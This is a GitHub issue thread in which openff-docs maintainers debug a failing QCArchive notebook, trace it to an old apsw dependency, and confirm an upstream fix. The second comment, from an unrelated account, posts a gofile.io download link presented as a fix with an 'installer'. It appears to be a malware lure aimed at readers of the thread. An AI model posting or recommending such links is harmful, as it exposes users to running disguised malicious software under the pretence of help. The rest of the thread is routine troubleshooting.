### ISSUE TITLE
QCArchive notebook failing

### ISSUE THREAD

**Issue by mattwthompson** [openforcefield/openff-docs#61]
Since I'm still getting emails for failures: https://github.com/openforcefield/openff-docs/actions/runs/10692669036/job/29641516237

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by j-wags** [comment]
Rats, seeing the same thing with [OFFTK CI](https://github.com/openforcefield/openff-toolkit/actions/runs/10692614980/job/29641361524). 

This popped up on my local machine the other day and I got around it by making a fresh env. So maybe this has to do with a pinned dependency.

**Comment by mattwthompson** [comment]
Those logs are pulling down a version of `apsw` that's a full two years old today https://github.com/rogerbinns/apsw/releases/tag/3.39.2.1

**Comment by mattwthompson** [comment]
Vanilla deployment is fine

```
$ micromamba create --name qca "qcportal >=0.55" "python=3.10" -c conda-forge
...
$ python
Python 3.10.14 | packaged by conda-forge | (main, Mar 20 2024, 12:51:49) [Clang 16.0.6 ] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import qcportal
>>> client = qcportal.PortalClient("https://api.qcarchive.molssi.org:443")
WARNING: This client version is newer than the server version. This may work if the versions are close, but expect exceptions and errors if attempting things the server does not support. client version: 0.56, server version: 0.55
>>> dataset = client.get_dataset(
...     dataset_type="optimization",
...     dataset_name="Kinase Inhibitors: WBO Distributions",
... )
>>> dataset.get_entry(entry_name=dataset.entry_names[-1]).dict()
...
```
I can't dig into this anymore right now

**Comment by j-wags** [comment]
It's possible that MolSSI resolved this with a new build

https://github.com/conda-forge/qcfractal-feedstock/pull/52
https://github.com/MolSSI/QCFractal/pull/848

Rerunning CI to check

https://github.com/openforcefield/openff-docs/actions/runs/10723246616
https://github.com/openforcefield/openff-toolkit/actions/runs/10711411405
https://github.com/openforcefield/openff-toolkit/actions/runs/10723285636

**Comment by j-wags** [comment]
CI runs look good, this issue was resolved upstream.
